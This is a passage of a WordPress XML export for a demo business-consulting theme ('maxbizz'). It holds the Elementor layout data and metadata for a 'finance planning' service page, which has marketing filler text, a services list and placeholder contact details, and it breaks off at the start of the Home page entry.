		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2784cf1","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6b0b1f4","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6191f05","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"fa0c07e","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"508a439","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3808452","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2deb288","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"aed5597","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"18feed3","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"2687052","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b9de86","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"75d682b","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"eb8a5b2","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"6315c9f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4d6ddf8","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#FF8F3E","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8083fb5","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ddfb0e2","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8ca6f1a","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"3cf7ecd","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"fc883e9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"42bd250","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"2285a93","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"90b3f9e","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"0748676","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"02b4af2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service.png","id":913},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"153c642","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"17a1aa0","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #ff8f3e;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"66d8a4c","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"01b2f8e","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"388d72b","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"54dd58d","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"70d0b23","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"402a70c","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"df6115d","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"88e18e0","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6f19085","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"2d46fdb","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"d5f2cb2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"6e86112","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"6c1bc64","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"b727cfc","elType":"widget","settings":{"text":"Divider","color":"#FF8523","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":19,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"49fcb72","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"52b73d5","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"4307bab","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"ec48b7f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf.jpg","id":955},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"b115620","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"bb264b4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d77e51b","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#FF8F3E","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"59cb606","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cd8ccc8","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"d762f68","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"bcfa134","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:7;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1506]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Home</title>
		<link>http://wpdemo.archiwp.com/maxbizz/</link>
		<pubDate>Tue, 22 Sep 2020 03:28:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1023</guid>
		<description></description>
		<content:encoded><![CDATA[[rev_slider alias="slider-1" slidertitle="Slider 1"][/rev_slider]		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
